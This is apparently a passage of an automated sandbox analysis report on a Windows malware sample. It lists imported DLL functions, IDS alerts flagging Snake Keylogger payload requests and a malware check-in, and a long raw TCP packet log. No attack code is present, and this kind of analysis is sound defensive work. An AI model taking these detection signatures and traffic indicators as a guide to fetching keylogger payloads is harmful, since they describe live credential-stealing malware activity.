                                                                                        gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                        user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                        ole32.dllCLSIDFromString
                                                                                        kernel32.dllSleep
                                                                                        oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                        ole32.dllCLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
                                                                                        oleaut32.dllGetErrorInfo, SysFreeString
                                                                                        comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                        shell32.dllShellExecuteExA, ExtractIconExW
                                                                                        wininet.dllInternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                                        shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
                                                                                        advapi32.dllOpenSCManagerA, CloseServiceHandle
                                                                                        wsock32.dllWSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
                                                                                        netapi32.dllNetbios

                                                                                        Possible Origin

                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        TurkishTurkey

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-12-05T22:50:09.931417+01002832617ETPRO MALWARE W32.Bloat-A Checkin1192.168.2.54971269.42.215.25280TCP
                                                                                        2024-12-05T22:50:10.040926+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549707172.217.19.238443TCP
                                                                                        2024-12-05T22:50:10.058361+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549708172.217.19.238443TCP
                                                                                        2024-12-05T22:50:13.916914+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549721172.217.19.238443TCP
                                                                                        2024-12-05T22:50:13.917017+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549720172.217.19.238443TCP
                                                                                        2024-12-05T22:50:16.524228+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549728172.217.19.238443TCP
                                                                                        2024-12-05T22:50:16.539757+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549729172.217.19.238443TCP
                                                                                        2024-12-05T22:50:20.512345+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549747172.217.19.238443TCP
                                                                                        2024-12-05T22:50:20.514577+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549746172.217.19.238443TCP
                                                                                        2024-12-05T22:50:23.147931+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549756172.217.19.238443TCP
                                                                                        2024-12-05T22:50:23.193532+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549757172.217.19.238443TCP
                                                                                        2024-12-05T22:50:26.263261+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549771172.217.19.238443TCP
                                                                                        2024-12-05T22:50:26.453865+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549772172.217.19.238443TCP
                                                                                        2024-12-05T22:50:30.249703+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549794172.217.19.238443TCP
                                                                                        2024-12-05T22:50:30.266871+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549793172.217.19.238443TCP
                                                                                        2024-12-05T22:50:32.858878+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549804172.217.19.238443TCP
                                                                                        2024-12-05T22:50:33.049361+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549802172.217.19.238443TCP
                                                                                        2024-12-05T22:50:35.943042+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549825172.217.19.238443TCP
                                                                                        2024-12-05T22:50:36.148062+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549824172.217.19.238443TCP
                                                                                        2024-12-05T22:50:39.949573+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549844172.217.19.238443TCP
                                                                                        2024-12-05T22:50:39.964544+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549845172.217.19.238443TCP
                                                                                        2024-12-05T22:50:43.954881+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549864172.217.19.238443TCP
                                                                                        2024-12-05T22:50:43.958340+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549863172.217.19.238443TCP
                                                                                        2024-12-05T22:50:47.969861+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549882172.217.19.238443TCP
                                                                                        2024-12-05T22:50:47.979997+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549883172.217.19.238443TCP
                                                                                        2024-12-05T22:50:50.565071+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549892172.217.19.238443TCP
                                                                                        2024-12-05T22:50:50.766342+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549894172.217.19.238443TCP
                                                                                        2024-12-05T22:50:53.689614+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549910172.217.19.238443TCP
                                                                                        2024-12-05T22:50:53.706762+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549911172.217.19.238443TCP
                                                                                        2024-12-05T22:51:13.379912+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54996513.107.246.63443TCP
                                                                                        2024-12-05T22:51:18.717113+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.549920172.217.19.238443TCP
                                                                                        2024-12-05T22:51:28.669036+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54999613.107.246.63443TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 5, 2024 22:50:07.186371088 CET49707443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:07.186374903 CET49708443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:07.186403036 CET44349707172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:07.186423063 CET44349708172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:07.186480045 CET49707443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:07.186517954 CET49708443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:07.196790934 CET49707443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:07.196803093 CET44349707172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:07.196832895 CET49708443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:07.196856022 CET44349708172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:08.564912081 CET4971280192.168.2.569.42.215.252
                                                                                        Dec 5, 2024 22:50:08.684941053 CET804971269.42.215.252192.168.2.5
                                                                                        Dec 5, 2024 22:50:08.685158968 CET4971280192.168.2.569.42.215.252
                                                                                        Dec 5, 2024 22:50:08.685381889 CET4971280192.168.2.569.42.215.252
                                                                                        Dec 5, 2024 22:50:08.805057049 CET804971269.42.215.252192.168.2.5
                                                                                        Dec 5, 2024 22:50:08.902867079 CET44349708172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:08.902952909 CET49708443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:08.903927088 CET44349708172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:08.905416012 CET44349707172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:08.905495882 CET49708443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:08.905530930 CET49707443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:08.906199932 CET44349707172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:08.906244040 CET49707443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:09.307548046 CET49707443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:09.307569981 CET44349707172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:09.307970047 CET44349707172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:09.308027029 CET49707443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:09.327485085 CET49707443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:09.328706026 CET49708443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:09.328736067 CET44349708172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:09.329030037 CET44349708172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:09.329277039 CET49708443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:09.329776049 CET49708443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:09.375324011 CET44349707172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:09.375341892 CET44349708172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:09.931361914 CET804971269.42.215.252192.168.2.5
                                                                                        Dec 5, 2024 22:50:09.931416988 CET4971280192.168.2.569.42.215.252
                                                                                        Dec 5, 2024 22:50:10.040925026 CET44349707172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:10.040978909 CET49707443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:10.041202068 CET49707443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:10.041237116 CET44349707172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:10.041280031 CET49707443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:10.041954994 CET49716443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:10.041984081 CET44349716172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:10.042061090 CET49716443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:10.042870045 CET49716443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:10.042882919 CET44349716172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:10.058381081 CET44349708172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:10.058434010 CET49708443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:10.058458090 CET44349708172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:10.058499098 CET49708443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:10.058542013 CET49708443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:10.058568001 CET44349708172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:10.058612108 CET49708443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:10.059463978 CET49717443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:10.059484005 CET44349717172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:10.059568882 CET49717443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:10.059956074 CET49717443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:10.059967041 CET44349717172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:10.199925900 CET49718443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:10.199961901 CET44349718142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:10.200035095 CET49718443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:10.200587034 CET49719443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:10.200623989 CET44349719142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:10.200676918 CET49719443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:10.200756073 CET49718443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:10.200769901 CET44349718142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:10.201040030 CET49719443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:10.201050997 CET44349719142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:11.201987028 CET49716443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:11.202040911 CET49717443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:11.202040911 CET49718443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:11.202146053 CET49719443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:11.309623957 CET49721443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:11.309628963 CET49720443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:11.309650898 CET44349721172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:11.309670925 CET44349720172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:11.309746981 CET49720443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:11.309751034 CET49721443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:11.311300039 CET49721443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:11.311316967 CET44349721172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:11.311630964 CET49720443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:11.311654091 CET44349720172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.008244991 CET44349720172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.008320093 CET49720443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.008555889 CET44349721172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.008620977 CET49721443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.009026051 CET44349720172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.009097099 CET49720443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.009330988 CET44349721172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.009390116 CET49721443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.013547897 CET49721443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.013561964 CET44349721172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.013777018 CET44349721172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.013850927 CET49721443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.013891935 CET49720443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.013899088 CET44349720172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.014147043 CET44349720172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.014193058 CET49720443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.014205933 CET49721443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.014417887 CET49720443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.059330940 CET44349721172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.059340000 CET44349720172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.916918039 CET44349721172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.916992903 CET49721443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.917013884 CET44349721172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.917017937 CET44349720172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.917081118 CET49720443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.917098999 CET49721443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.917107105 CET44349720172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.917218924 CET49720443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.917408943 CET49721443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.917444944 CET44349721172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.917498112 CET49721443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.918211937 CET44349720172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.918258905 CET44349720172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.918313980 CET49720443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.918387890 CET49728443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.918431997 CET44349728172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.918575048 CET49728443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.918576002 CET49720443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.918590069 CET44349720172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.918993950 CET49729443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.919039965 CET44349729172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.919070005 CET49728443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.919085026 CET44349728172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.919118881 CET49729443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.921356916 CET49729443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:13.921370983 CET44349729172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.921536922 CET49730443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:13.921545982 CET44349730142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.921602011 CET49730443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:13.921814919 CET49730443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:13.921828032 CET44349730142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.922127008 CET49731443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:13.922148943 CET44349731142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:13.922303915 CET49731443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:13.922648907 CET49731443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:13.922666073 CET44349731142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:15.610781908 CET44349728172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:15.610857964 CET49728443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:15.611366034 CET49728443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:15.611377954 CET44349728172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:15.621001005 CET49728443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:15.621016979 CET44349728172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:15.625694036 CET44349729172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:15.625786066 CET49729443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:15.626310110 CET49729443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:15.626321077 CET44349729172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:15.626688004 CET44349730142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:15.626759052 CET49730443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:15.628133059 CET44349731142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:15.628201962 CET49731443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:15.633538008 CET49729443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:15.633549929 CET44349729172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:15.635548115 CET49730443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:15.635559082 CET44349730142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:15.635828972 CET44349730142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:15.636009932 CET49730443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:15.637129068 CET49730443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:15.638720989 CET49731443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:15.638746023 CET44349731142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:15.638981104 CET44349731142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:15.639242887 CET49731443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:15.639590025 CET49731443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:15.679327965 CET44349730142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:15.683327913 CET44349731142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.524226904 CET44349728172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.524312019 CET49728443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.524338007 CET44349728172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.524390936 CET49728443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.524488926 CET49728443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.524525881 CET44349728172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.524683952 CET44349728172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.524749041 CET49728443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.524765015 CET49728443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.525213957 CET49739443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.525258064 CET44349739172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.525497913 CET49739443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.525759935 CET49739443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.525774002 CET44349739172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.539762020 CET44349729172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.539860964 CET49729443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.539977074 CET49729443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.540011883 CET44349729172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.540153027 CET44349729172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.540256023 CET49729443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.540290117 CET49729443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.540488005 CET49740443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.540523052 CET44349740172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.540590048 CET49740443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.540780067 CET49740443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:16.540796995 CET44349740172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.557121992 CET44349730142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.557163954 CET44349730142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.557224989 CET49730443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.557243109 CET44349730142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.557297945 CET49730443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.557905912 CET44349730142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.557939053 CET49730443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.557987928 CET49730443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.563141108 CET49730443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.563165903 CET44349730142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.563635111 CET49741443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.563673019 CET44349741142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.563899994 CET49741443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.564109087 CET49741443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.564122915 CET44349741142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.823234081 CET44349731142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.823287010 CET44349731142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.823363066 CET44349731142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:16.823364973 CET49731443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.823554993 CET49731443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:16.825366020 CET49731443192.168.2.5142.250.181.129
